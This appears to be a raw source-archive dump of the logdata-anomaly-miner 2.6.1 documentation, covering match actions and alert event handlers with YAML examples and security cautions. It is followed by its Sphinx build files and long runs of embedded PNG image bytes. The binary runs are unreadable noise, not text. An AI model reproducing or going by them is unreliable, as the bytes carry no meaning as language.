DebugMatchRule ~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. Because every evaluated log atom is printed, this rule is intended for troubleshooting only and should not remain in production rulesets (output volume, exposure of raw log content). DebugHistoryMatchRule ~~~~~~~~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to an ObjectHistory. .. _MatchAction: ---------- MatchActions ---------- .. note:: MatchActions must be defined in the "Analysis"-part of the configuration. EventGenerationMatchAction ~~~~~~~~~~~~~~~~~~~~~~~~~~ This generic match action forwards information about a rule match on parsed data to a list of event handlers. .. code-block:: yaml Analysis: - type: EventGenerationMatchAction id: ip_match_action event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" AtomFilterMatchAction ~~~~~~~~~~~~~~~~~~~~~ This generic match action forwards all rule matches to a list of `AtomHandlerInterface` instances using the `SubhandlerFilter`. When `delete_components` is used, all components from the `subhandler_list` are removed from the default `SubhandlerFilter`. .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector1 paths: - "/model/second" - type: AtomFilterMatchAction id: afma subhandler_list: - NewMatchPathValueDetector1 stop_when_handled_flag: True delete_components: True ------------- EventHandling ------------- EventHandlers are output modules that allow the logdata-anomaly-miner to write alerts to specific targets. All EventHandlers must have the following parameters and may have additional specific parameters that are defined in the respective sections. 
* **id**: must be a unique string (required) * **type**: must be an existing EventHandler component, i.e. one of the handler types described in this section (required) * **json**: A boolean value that enables that the output is formatted in json (default: False) * **pretty**: A boolean value that specifies whether json output should be in a single line (False) or pretty printed (True) (default: True) * **score**: A boolean value that enables that a confidence is added to the output of certain detectors (default: False) * **weights**: A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted (default: None) * **auto_weights**: A boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances) (default: False) * **auto_weights_history_length**: An integer value that specifies the number of values that are considered in the calculation of the weights (default: 1000) StreamPrinterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~~ The StreamPrinterEventHandler writes alerts to a stream. If no output_file_path is defined, it writes the output to **stdout** * **output_file_path**: This string value defines a file where the output should be written to. Default: stdout. Place the output file in a directory that is writable only by the aminer user; world-writable locations such as /tmp allow other local users to pre-create or symlink the file and thereby tamper with or redirect the alert output. The /tmp path in the example below is for demonstration only. .. code-block:: yaml EventHandlers: # output to stdout: - id: 'stpe' type: 'StreamPrinterEventHandler' # output json to file: - id: 'stpefile' type: 'StreamPrinterEventHandler' json: true pretty: true output_file_path: '/tmp/aminer_out.log' SyslogWriterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~ The SyslogWriterEventHandler writes alerts to the local syslog instance. .. warning:: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks. * **instance_name**: This string defines the instance_name for the syslog. Default: **aminer** .. 
code-block:: yaml EventHandlers: - id: 'swe' type: 'SyslogWriterEventHandler' instance_name: 'logdata-anomaly-miner' KafkaEventHandler ~~~~~~~~~~~~~~~~~ The KafkaEventHandler writes its output to a `Kafka Message-Queue `_ * **topic**: String property with the topic-name for the message queue * **cfgfile**: String property with the path to the kafka-config file. A comprehensive list of all config-parameters can be found at https://kafka-python.readthedocs.io/en/master/apidoc/KafkaProducer.html A typical kafka-config-file might look like this: .. code-block:: ini [DEFAULT] bootstrap_servers = localhost:9092 security_protocol = PLAINTEXT .. note:: The header [DEFAULT] is important and must exist in the configuration file .. warning:: With ``security_protocol = PLAINTEXT`` the alerts are transmitted unauthenticated and unencrypted; this is only acceptable for a broker on the same host or an isolated network. For production deployments configure ``SSL`` or ``SASL_SSL`` (and the corresponding certificate or credential parameters) in this file, and restrict the file's permissions to the aminer user since it may then contain secrets. .. code-block:: yaml EventHandlers: # output to kafka using the topic 'aminer' - id: 'mqe' json: True topic: 'aminer' cfgfile: '/etc/aminer/kafka-client.conf' type: 'KafkaEventHandler' ZmqEventHandler ~~~~~~~~~~~~~~~ The ZmqEventHandler writes its output to a `Zero Message-Queue `_ * **topic**: String property with the topic-name for the message queue. If topic is not defined, then this handler will send messages without any topic. * **url**: String property with the url for the zmq-listener. If no url is defined, this handler will use 'ipc:///tmp/aminer'. A comprehensive list of all possible "endpoints" can be found at http://api.zeromq.org/master:zmq-bind Note that this handler does not authenticate or encrypt connections: a ``tcp://`` endpoint bound to all interfaces (as in the example below) makes the alert stream readable by anyone who can reach the port, so bind to a specific interface, firewall the port, or use an ``ipc://`` endpoint in a directory only the intended consumer can access (the default under /tmp is shared with all local users). .. code-block:: yaml EventHandlers: # output to zeromq using the topic 'aminer' - id: "zmqe" type: 'ZmqEventHandler' topic: 'aminer' url: 'tcp://*:5555' # tcp-port 5555 on all interfaces logdata-anomaly-miner-2.6.1/docs/Makefile000066400000000000000000000011721437606560100203020ustar00rootroot00000000000000# Minimal makefile for Sphinx documentation # # You can set these variables from the command line, and also # from the environment for the first two. SPHINXOPTS ?= SPHINXBUILD ?= sphinx-build SOURCEDIR = . BUILDDIR = _build # Put it first so that "make" without argument is like "make help". 
help: @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) .PHONY: help Makefile # Catch-all target: route all unknown targets to Sphinx using the new # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). %: Makefile @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) logdata-anomaly-miner-2.6.1/docs/conf.py000066400000000000000000000041501437606560100201400ustar00rootroot00000000000000# Configuration file for the Sphinx documentation builder. # # This file only contains a selection of the most common options. For a full # list see the documentation: # https://www.sphinx-doc.org/en/master/usage/configuration.html # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'logdata-anomaly-miner' copyright = '2023, Florian Skopik, Markus Wurzenberger, Max Landauer, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf, Georg Hoeld' author = 'Florian Skopik, Markus Wurzenberger, Max Landauer, Georg Hoeld, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf' release = '2.6.1' # -- General configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['recommonmark', 'sphinx.ext.autodoc', 'sphinx.ext.napoleon'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. 
# This pattern also affects html_static_path and html_extra_path. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] logdata-anomaly-miner-2.6.1/docs/images/000077500000000000000000000000001437606560100201065ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/docs/images/aminer-config-color.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logdata-anomaly-miner-2.6.1/docs/images/aminer-config-color.png000066400000000000000000000737031437606560100244600ustar00rootroot00000000000000PNG  IHDR<tV:tEXtmxfile%3Cmxfile%20host%3D%22app.diagrams.net%22%20modified%3D%222021-02-18T11%3A43%3A02.619Z%22%20agent%3D%225.0%20(X11)%22%20etag%3D%22XN7FnLR9z8rV8TrF2oWa%22%20version%3D%2214.4.2%22%20type%3D%22device%22%3E%3Cdiagram%20id%3D%225UVBhFNdrDuveJu0V3Pm%22%20name%3D%22Page-1%22%3E7Zpbj5s4FMc%2FTR47AswlPOYy7VRqtSNlpe72zQEH3DoYGZOE%2FfRrB3MnQ6qNk1mpiTRjji%2FA739sH5%2BZGVjtT58YTOOvNERkZhnhaQbWM8uyDGcufklLUVp8xyoNEcNhaTIbwwb%2Fg5TRUNYchyjrNOSUEo7TrjGgSYIC3rFBxuix22xHSfeuKYzQwLAJIBlav%2BGQx6V17hiN%2FQXhKK7ubBqqZg%2BrxsqQxTCkx5YJPM%2FAilHKy9L%2BtEJEwqu4lP0%2BXqitH4yhhF%2FTgfoH5%2FPLD7wJ%2FjReo%2F13HtJvH0w1zAGSXL2xelpeVAjEg6eyGBQEJyFiYAaWxxhztElhICuOQnphi%2FmeiCtTFLc0Fy3DL9vaAIOfEZPWP3IuhkHKnpWCm44os7KTqlHPhRhHp4tvbNYchQMiukecFaKJ6uDOFXrle5atro%2BNkq4yxS0RraofVM4T1UM3fEVBIf4F3BaYxt3FMAE644z%2BRCtKKDv3BqHnb4ULguUOE9Kye76xNBeauHrOVVwdRxPWK5x4giPM0nL12OGTZH97Z6ydT0Ez3aEz2sYItdp4c2y3dsaey%2B0c%2BR1zUvf8kT1owlv28qOHd72jTPF2deG2dc99N5ij7W507m9NqAcrsLyn4ey%2FL1hHN9i5tQWlv3bB2gaE%2FlYT2Pnjwbradyt36zojYAEwDNvQA9
a2Hw%2FWG4D9hBLEoOy4oskORzmDHNNkwFtw4G9BTaiMrTo8lQkSHCUyjBPckLAvJVUsIt2FqtjjMJS3GVWx0flGsgDX6a7PYLg%2Bm85YdKZLlPmIt7tE0g7xQRQjWXyFLMNJVNWIG7Uq36lavV324%2FmjR0XgPFpF%2FxoVFwkkxW8dL%2Btoj0RL99WxeoC3hXw%2BiBd8gUlIfot5WUzv4WJauiOJN2JfbedeAKyRSOK%2BJ1%2FtCYXLse9i4S81gfWvS9Roi89M7We1e0S%2Bfaz2yOZ8X6xXHCiqbOOOoNNCJnAFC5SEqrgOCMwyHHTpVu9jzsvGKo1sjuTB7LX81nxROEj%2FTtJt0RtbRCsbQ0SE8Ifu8GNI1R1eKRY3rsXzDP%2Bpu4ybXk%2BXjOYsQKqf1cr8Tg5Vn4mqoThkEeKDoQR1WLSapbJB9isPbRmdrLQolGM2TlST%2FQ9p1bFY4bbT9XJaVVtqxXIff1A1hyfVV5yicwb%2FfcZVjPLy5AzWfhVnqfUAyPUW72GEFv0baozGXGd6czPte0Zj1nB3%2B5ykOX%2BnirYUFHGkVq1sqzcFR7S6r1TD3OaGszzgORMT0KA78YPHshj8D9JG%2Fbl4A8XqTbGodqCBYM7o3%2Fi0KeYN4MsgY6MuKeMxjWgCyXNj7WFq2nyhNFV6%2FUCcFwoezDntqolOmP8luz9Zjrr8u1W1PqmhzxdFJceF0Kgv09sTbjqEEjDOkcoV%2B0wZh0w2HLrD1dHWBXHFZfOn%2BDIuaf6hATz%2FCw%3D%3D%3C%2Fdiagram%3E%3C%2Fmxfile%3E0^ IDATxgXg @AD Ĩ1&h4XbP,(6TlQc4GKQclػ ,6օݽ8?sogbvfVB!G&vB!% !BLB!< <B1yx!b0B!a!BC!B!&!BL<7oČ3о}{xzzVVVpuuEƍ1b ??_R \r_}Wkkkx{{˗%vA&A&ȑ#%bXJ{bly))SF0פ7+vaiiYd|2xmʕ+J9RM͛7+mիW]рI7oݽȇ<==QZ5-[Ve8N: mcbbJiWlZh!lot z«W=KWƍնc1>'22R~ǏWنǸ0 ԪUKi~'8vvvacc~˖-jonWL`ee%ķi8ay{xL ܽ{h֬\]]aii |ᇘ8q".^ֺsy>H >^3|"?s ֭u;d2ѣGE}tCy,]Tv3x2GL*zJ)7l Gdd$"##v ?^hx U lٲY&F%/wQe˖E:uPj";_deΝ;<`}? 
gϞiU~my[ZZ^zXbiq[ߏHL:Uhgoo/lH\Ӗ-[ѣG |rg.[,ׯ/ 4(.S[kٳȼ+UzZu*e~U}^ '''XZZ"88{ױo߾"GEE)ͧD[A֭Kʕ@˗/ v)|75kKh-)F5аaCBiz-mu~6m _-<\coo:u|Dɓn7C'sĤ|͉L&C5m6=TkZؕ*UL&٣C4xzz mj֬={ ++Khs]Ki[رC-y'v؁/^mܹ*זrJByyy8#;&L+~-}5=+''B[U"ܹsGœ9sԩSEBv4Wzm @ֺuT1D)|]ܹs';;M66lPe;C'sUŘ1cLOٸqy20(]dtжlٲE#BѴݻ'|+WgϞպ|3[}Vn.}94`xcUJĉJŃkOO4Ix$Uq6h@n֋ *SvmÇpuu+  x{aZ5O:scdNd$ZjL]">>^)n౰\.8OCǏ Ӝti̘1WIW/BuzݻTTt)]LxX#V(~Uq)~Uܾ@I,Up֚^~YځG۝K~I &;;:v=zr T|Z!رci :/mxm?;GUSU:{=.\PZnR<#F+Ν;z"%ѯZWҁ͛JsJ;𨺡B׮]ڵk1ydM4VRիJt-"K,Ӳe" = <_ŋ{WV~~iNU(~iӦe20(xmxm>W^i[(x!⭱HKKSZn xthXS?ܹ1pnߒ<𺭭Nmڴ-Z痗UVi}&OTQw!~Ez<&x(=~^^?SMq70DEE #F >\뼴QGS@${Vz&jHWL@ccN)])~ZILLTWׯbjxm/TZeǜ9sm6\p/Sx\z&m{5kVd:TQAkTѨQ#aEK!(Ad:t:/mDT?P׽{wu[){ Z{ ﱳ+2tMӧWIӧOė.]i=zS8mQlٲK#κ^3a=;w.2GL*tY/Sک-[VMI@?ca׮]JSB_~tooomM2Eh(]w}BO>DE7oT[C_~_|mȫi%x>C xqJAz…j&%%)@%ѯR <ΝSET"*(eHcǎM <f*~.ʁ'((H4e-X@|ѤI  w> |ذaΜ9Ox3nܸ8Cʕ+N@ݳ!{~NW>.U|p 2W~(==SNUQnC)y pQիWyf.wiVZ> gϞ{5._?2ٛDUEIWWW]:_SXXX`ĉEcǔ~zJ`~b {y0=33VYu"S|prvZ3G_ƚ5k)~mQ|Z/_OϞ=.[oi)faa 3/_ѣGp}TΏGL.Uaa jVVVضmy+E=н{w_-PdPZh=znݺ~+ ʕ+{j*duY_Cׯ;wʾ|tL'm肪 */23˕+-[W^#sgeeÇ+;`РAJTz~)zUC4 trrBUkw."&x7*v!11Q|cccUWrs.T퍄u6Lo鲾_k׮Up1J טvvv7oإBQ1g`ƌbB$سgT~AR!Ĩ;w.V{]  <ҥ :uꄔ! )) 9ugϞ]Y|9*W]v] !$۷oGJzjK1Y bI#"={D``eBY0b|bar >>>oMVbu2ŋ쌭[] !6mB*UpeK1Ν;>>> <ի'O] !%)))[.֮]+v)&)„ 0}t `ڴi  (ѿnN!cΜ98pe5 OS&3eΜ9 cdddN2!H -vD Ƽy.B̚5 aaab! xLW^|bA!DXXXb!: <&ȴi.vB$ɓ1sLlٲ B! ''VVVb!: <&?P "!''xLƍ#!!A2!HSNYfb!* <&Dbb"ԩ#vB$H͚5qu "44g B!dƌ2eeŋQ^}Z2!H'NEb! <&@vv6*T vBիWbQ0111رeB1>S۷O2J ((bA!;w.&N(v ЧO;wN2! ׯeŋ?֪N\xqׇG B!F@ZZ.`NNNZ}۰S.˲mׇG >k^rJa2dR3q ªU~*'\\\ѣ<\|X8VnGU"tѽ{wօG K.ň#ׯGll;Rw^lܸ0dXB×BÆ E; 6@,^ׯΝ;Eߡ(J۷#:: ,q>]vlٲeb׮]z +VR˅oLFjժUQFo 2A&}ENK;*)% 0tPr4ig}Sy&d2xd2n޼)J- } \}iѢ.\͛7兔r/Y&еkWܹsGXرc1tPl~!1{l;wĀl2o&կ_...Qvm\~Dͅ9"]x=]6m...&M}N< \j fBNPF ޽[DS+WT 50P}]6bbb4ٹs'j׮k׮!)) ~~~2e 7Dձ{nܽ{ΈGzz:ƍ???ov܉ϟcڵ_>޽AXnrՁӧ{|y8::HKKW_ ˯R nݺ\}bϰm6r!𤦦 [nEzz:F LSQ\ρbx)/X[[ 5()<^:.] 
^ժUϑ+++!\M6}3ԩS}5mڴQZ'|h$$$^z[S <u2eʠo߾9s&N8Y^ZZ믱m6G‹;d27gmVZ%L{^ \t\gׯzffpp\oׯ#˗+5k;aڽ{`ii"xv܉f͚ ?~tGM6)ԭ[ .Dzz:r94Ǐf͚EСCHHHP 8 ۷ѽ{wkrPR%>}:t(urϣG₝;w"33(S _3gΠB z*={舃"==k׮N8Mٵk6}9rJdeeaݺupwwGjj*5x_ 4æM'vIJb֬YW1𨁁[W_ ֭_^zA.#++ SLѿB./xƌ#\uVԮ]åK  ǎCZΝ;cŊS\9#TT ~!?\^$;wÇ},QԘτ РA8p@RthРeQ%cJJpE.suQj(1۷ʕo&v)zuVXZZСCj0𨁁Ғٳgdž `|עE4d 77WRފ/_" /V9G Kď?(v%œ9saQR}4O>D2J6mȑ# o50PJ)G_SNRaҤIشi0PJ)G.]`bQ*ܹ]vJ)(SJ]Fjժ`Q R}zR`}xC)Txd2ٜy!d7QG \RJ8tPBJhoĉWJ"E:u d2>{QJ){#G:K0d`)t#;;ׯG͚51l0$&&jl qFl߾]iP?s?"|$D)LL9;)~ijJDž[lQ:~H]z*L+++=[n˗/K:`9r$*TS:G "::111sh.đ)57?/(?G(ZWZQسg6oެ!Eoٳ',--ѻwoL6 GAZZZ Tȑ#6mXYYW^رcG ==&;"ƍRJ;vu)>|jժ! XhpI\z |HMMիWq a… D@@<==^z!<<G1JWD`z Ԧ;R j늳UVCwbXx1FQFyA`kk KKKvvv-Z 00cƌŋ{>-d2?…ߙ(JދL ;R}'\34 WIZr2piEE̫,63j9 kf+{EDx(1OpiEEѷUIzi5rxC)T!$nhy*JڕCm0PJ)Ge!v* =Ѧ>Fx(ҡXQTlkNڽ"" 2%וo;RJx0 jK7 쪊J0\Zd2F7¢NwR黸n2Z`[ѷWi8SxG#2 y/r;RJ"^K>4[8JÕxk+"R0`sSpvq-J)E+XُRů {GzJQh]gx48`_>s|VbRꆩN \2n<~HL+MC-gѷaI:3lj.{EDT ؤpyU\{G:K;J)fޑ8<WU@҉ :?L&C^N*. z()I/D m\CX:m,քu7E&RJĵ#bMXw>caہ:?DA}ٸ ?63=k; KPZ_i(ؔgrLq3)o7bFT e<~Hrpmp(VrL*Fwz]UtwcR]\y/3{ED 6PZ ށ t*R9svyfC/n܍˫!qh<}=ygvL&CFV'D)TEGVK < d2> >}'R*}'V|PW_,?S?Hy&׸iD߁(S½f#a)x.|%y14";NF`HϋON⭧*חG VEy(Am} aQ <9!Hmg=aՈs2OZ_ΣRj<{oF,#f۬$w*vOi}x0|N,BkRJu7ı:+!L#2 O\Ôot7q <E)؇0XUŘxѷSi8zA& IDATG- J= Z]b^ZAAk0𨅁RJ>J=ku/uj+G`QR}4S x\/3 BJ˽;x5;z+_.o0𨁁ϣWsL(&P7޾xfz" >W Bm0ν8lR]cE$ڸ^Yjrs1$,A}G <ԔxSӰmWLz ׯ[ϲ623 |;zR;u' WEuF~^59x C<xJjJj <Gm_""q)(P7]NMC0קRgˠ2h$Bm܄2=?_/}(5xL&3@Dq~n<PP`Qw}.Zv~juQjHM%d2ѷ!G <kآ1ݽ.; `1J$dwOc۲I^i;k2HK-0PJ)GS<JECx(꣩J)c  zvG7)v juy{l4 mO-wCx(꣹udOJ?'5Fc~.`QR}4s/a9 6KGޫWem:?xC)T9݉uwV_6?xC)T9{lO0x0𨁁RJ>s'!ޢ8RJ>{؇0 ZӺxR-cf?5X Z G-ߌX`!8|)@Y/:g'&y3QJ)DȜȐT:~HƟľSԮP7OZO~^cu6C}){EDlL܃஁TCRJTnc03*OPy"EǜÔ5a{S࢏>FLTۼ7gpeA^95?0X EWڽ""C16gIa I)A1)" #16vCJi `B<2 AGJ G`RN*Wڽ""l03fbg!pT>mRj&>"lo"bF o:?qR28{{ Lޖ]Nl+^$3NǠߺ~[WQJ)5s.<8ϲ<~H]z 03.~[WsQJ)+/iJܼW8yc?~9č!0c?'oCN3/iwqQ{?zohXW_ޛާ`Uw%}5Sp)D0$-oib.,. ")b." "2&$az^9G|ϻY,pz,b Y%j;Tp:J}4JOX~ϣFsyB~naqW}ehaښ1ePJ)majsOa:)! 
ܬXO++0wz ; z>iZnٛ'qZ]Yv]31f[`aG+ J)b{4&&xNNg 'Ed|=^p kG6@J; yK#q ye%(*'6x&'$=(mO;rx]7v&JŮG jMPJ\0WŷW/\mcMtJOx!8#U(Bԝ X}{q}d?i;gM3/OOBQe*+Ffߔu'"MdpN ,G@zJԘ#bcHw0?R |PF9.D!A>JO8E"]]01w /!6r4(Rap: BL 8#yy!GOxTYۚ=ep<s/M j2x Cu2x5VWF"Y%j|r6 e]>x>9i.GxQ =0x1j쒢F{XOϝ餭Vecaښ1B;R]_7LLSNl=4XZWURJ)JO+Œ|uM? I]:37\EYuyK-} >v_"6f=*/l _/7 ;>WrJ)W#h۬󇜨 pmL +[4WsC$vg+U~aCb~^8e\玧RAt2^ӡܲAΕ:ȉ';|{,9ɠ45쳤WER}e 4_%QO2 <Ԫر t2F+U'!*Ks;血@);n֓<ȑ_w.=΁XqsL 7 Y%ju*tf+?i);/GeMB &l@g8 &Wޫ"!7Puy!\(RJ<IC Q]jp+M _ᔟ g!lA@RȬse:kzjqh?y/ɺҬB,D-x\B ="\D)T0J.xrnz{ Ly DP@'Fji{?ޭm;l}5ÌU34w7y^ 7N՟J~'R*>F<)_aӂMͬ{jGOFuϿLlL gf׍Wޫ"!#<7.D)x<|J} I}$_XOz,baNznu@^=@iqYaӐ2xhwJ)ǖp^1\SNA+>rl"&x >|1& GJZ<&[AN?G?~9k&RJh7n];Zc<Jܮ+xLٖj4;wJti*RJ8)..)L'ŎeڟʪWL{e?#7ڮ+xr0 T̟2G+I!$PJ)5>BfI} 6bKcY5af?n`D/\<3^[JͶ%Ze9d |<G+ J)b{y. I}]=×i:xFҭxXP$^L6Z?gޓ0xࡔR*F!!Gl,xe%5{XZdܼGj 1zr RJ<= A_<έ\5i`hC)T :>?|ꅴ˚ v5ԣ< =0x(r 4YlGy(xfi!ҮgDPH||v 39KsJ)uz =0x]Q`PYi vC`S)-*(-.Ûi(*,ƛE_j1xt W4D~g0Ommm?̆I'u6'3PW.x >c+v=3GO ͶaOS.3_kq74~2x,dNO;rPkx/&vp {a"(> v=f= >Qd<Y; W31 '=1S3ӆZ#zf=f5cߝXL_([=j ]n ^\>|FOd3 *W#/;yYF3u.(_cxWsZ?\?x޶?xfŪ8~ܦDot1<&`ߦF3,*TWU QόCa -?ΦrǏ}F&RJyZd衣BPJ)5 yCGRj< A)02x%GRJadK:/R =t_J)#/ 333 bDԿS 2'4?C9z˺sf5t [=7gnJ ++ i!556l@=j*(JTUUI2Kee%9+VW^ذaZt =`…RA!DX[[?c̙޽;䄨(6ٟZFTTG={6D_' 8RA!Dddd`РARn9s7nʕ+c"66PT(--<2TUUT*ܹs ۱rJaӧfϞ7"** s3x~ WWW "C6n'''ǐ,,Booơ7O1H+aݓz B!$'' z b<")) cB1 ͛7ٷoBX~=8 @0x kB~W Xh+BD F?AAARA!`RAObii#GH=!f &H=i#i jaڵF>}Я_?=666غu+x 77%%%RNy)))Ann.RRRHa֭Xd F~o߾?>GI=:yJ`<#::Xz5>bذa:t(޽{CP@J)5 {F1tP 6 իgDGG#??_2STUD,'IENDB`logdata-anomaly-miner-2.6.1/docs/images/analysis-pipeline.png000066400000000000000000010711321437606560100242470ustar00rootroot00000000000000        +G" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?S((((((((((((((((((((((((((((((((((((((((((4|O5~16Z]K,?,Q4.%VjWoDvW9v'x'Fq'8UYQpA #o?>P?Wފ+_G/Cw(EKƟP>WgE/ #o?H[O(nZ`T+3`R}[x^% ūs]$lee1㌊O<,,wj^nufl`3%eQԱ|u+?.f_uY02R\cMhy۴WƩjz6_-%#1,MCe]鲉-.B4E|+obYiYåfGr'ٲ>kI]YN:huGw 
@tQ_f/⧊-,UZC}"EȈC`a@|Q_"~~8~$Vjɤ"{{$Ȯ&s_]E~j^ ]|qC?i?@tW-O?㏏vL?+߅= oon/{Z?y#W5e7[J̋$RەԌ &(ojz$ [N"*62>- ' >&H~%|A;hTIE~j_5IO/|M*?HY?i7 n?ksԵ _ׇ[>Oy#I+bP73Ng4QEQEQEQEQEQ_|Sb,uq۔(08U`I&>ڢ/ޱWSMnZK 9%$5柶/5 hFen^*g(ck>'+o[wJ̣>L K'>|!lż:vKT3䜑k QTZzFyD:S8ԆA`_C]'H:J0'9p~vyo_'>X],/m^}~xgO4KHAh 3KWb1xjV<C/u"IC?:kiT G'/Ci+쏇?wc~֯x_Sׯ5;uu{dEUm Ԛj׊_1,52FeK6.!r  A+? |IJ LdZ$Zzur}ύ?i|HinZ?,R=I{k$Eѡ _?ATs|%x3How]h!'¨Cc*?^mtf fi:0r[7h/KR?4]ZaXu z"oBDSfГ3~57RTJSC2)acݱYK'5 yUinDkNAhBO_uK!'EjG_kW?OMW+jp>_-5F٬2Fۑ:cx}}g LJ?뭯7аXcZIeP"[izt~?Kr8>}}E~V[i"ۍQt븥bW+<kǽ~Q_#}rNԚLcܤt+_\V [] ߪ_타@>j.r _|ߵo s[脠g"ckg"ch@jn=>|lԾ;ZӴH5MNtay -T {1V_)Rf]>PIu3 = 1Ё:M?qI. @=)""5ii+$ q rT<ďZ(C[|)t2(G<{9vz4rIz1g;RVxbT 췇qȍNWu?gPùTm>%{ll[ E|3?5Ӣ?Q<'mui6}wm!GN ƬC7S`c췥xZx[N6`bQoB `9p9(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((~MBuKc1@mT7dcEaNΪWRVzE-'/x:O Ƨ]Ggm) Oa]?ן>,7Ehd90[ ~*NOzŽGwfj+ WI!J py;ܲM^voD~|-})wjfc`2Y $?O%xG={ J)l~4OzwȟI7gɆ2Lctԭ|]cck&׽iRH3;~Ж%I>_&u/f}vk*Ps54WG3wO% z ou_s_&J{_:j[y8k5]Lz_{ LMKxPIi=5_^'ss9%G'S]\H]bq+e&jcp˜&y ϚG֗T3clKS0_$*3袊(_|(m0kr#6щ6K txg`tX\J JI|1OX<]a ?~'O,.΀=)_}_?U5_௵򦾳K_&Wxx)h:(>SC)^`~'WSS} }7qjb]sšw>6u+KD@b( ( ^ }j۬Oȕ趠U<a/W_ x7V_=+ jpUrH琨ڪXn2Z|!t6:lɜg]~D˪|W5E.0=+L}=IbQLc݉k/ 2o@?Ķ2 NZX%4uڂF0%%ǩ}}c^[Nq?ľbذ:9R'{؟5 j pIЖCϭuO&<a[;G&; N3 `_Ś?>?,{%S%·۟u|aȋ|`2!PWƞ&׵XRG)A ;d# qVد?7*jn{P״iZfkU ##y · ~#\3uir;I?:+_6F0L2IS >xP|5|UVp?땷J_Lۖӎcc_4~տ\5m>Sjۋ@USjۋ@8xZ\z2 6vG\k*&>7!}&z_CP%C֟;7=I2aA6>V=}FE|w_ %z&#iu];%Sb~ڿHc mWơj$(3+յ8t]*P$[BTdU,q ۖ]SMf_)veQ} RoT}C#d㗅7y[yO@?}i3gi0,V78it{#袀>NZX%4uڂF0%%ǩ}Yo<[^j7} d?\׫~Ӷ|/,Tcfx3* -.0(bIxE7R2>¿,8感Uߋ|cVצK;7pH@oڢ3̺s0-27[=Pwwcw1m$%̆Qn1r}pp ý}*{A~_h ߨN &\(9*?h>,6ocg(`;RNI=5EQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEWS < ROdo}ΖT'WXE,@I+>8ı$bґ2B;n;#sW,-oI{?**Nkm+ _wTX\B[˥؀8 2&o#.Hk;BM.Qs&܎_F ѡj?(?b_]-yO iޙT/u ĚM:|ž+ξoOZTyY_cxt*'GC>[G8_5z_gň"H(E @8F{3y5[o?ziTi G/Cw+Q|_~WU`t>K]J(UM~\<2xƿ/^[M=^F 
Gr2;WtӚewk~cx7f_Lc݌ e z?%՝@Ȑglq?h/WM16# sr>׼?xcTNլvZIwZ7}7s FTZ4 s::} w Î.;zk^\ @{_?x:OX<]a ?z/S%SU,> Z)jG_kPM}g LJ?뭯L} eѵGIY2!c8ݴ'Ex[KQӬӸQМRpp'_[>84Py׷q+HGI?C?FGZG ,+dKƺًRΗ1SM%3P,}K=5ok0iZ-,qyEQܞ}C%?U"kPHR{QEQEV'?J?[VbxD>E~w& YҺM%S_tW7+Do=&M4Z|ċ6_WIE~pxKdžu)؊Yp 1?@GGï\jvp3xwRDRVc0rW{^g{MƋ2=QjС2  @>KOޢ}Z+tB~mF#Wگ֓` uU*P~6J~ϧfBNqx1}G4;Tn7U:# k FI$8H**, ~ޤ=S G]V=]/1|R]bȞf.vc@Cx; k: oW?1I)>jR7+o|RԬsgpYS?27AW><X$^p}A\j~!ɩ2iGb7:>׳|Pk-6MGQYhpÑ v+>*~2xGMjIWnp>4'ۢWQK,=d`Fu?_[%\V!+;;HtH-mXmE8ע}?j.r @YE|)^F5yW  תE|)^F5yW  'Ĭ/#ԇMGǭ}7_ i|,,|SBդ{YErF"}@doc>>rOyK\K[y8dV 3 -gXKU$lW憵s?wۡ{kSv4RNeu 1^n?|$&K RP64#^HN `wI=qkxSǥؓOc|{>M)}.[{xKN!~g/,xgRA 1݈kz ~\:uƧg7u)Zh$E%`v9h%}G4O4_,ʱEB@03r3su4mik v]UGhwXoW~1[mV1z?Dk~weP=W W↳mbS}?L2 zp>gcs}}:|%W/ԙg r#!#Ƕ(ի_)oE-${8'e/!bc#{z;fD'bt-J瑓Nxhڟ4093RU 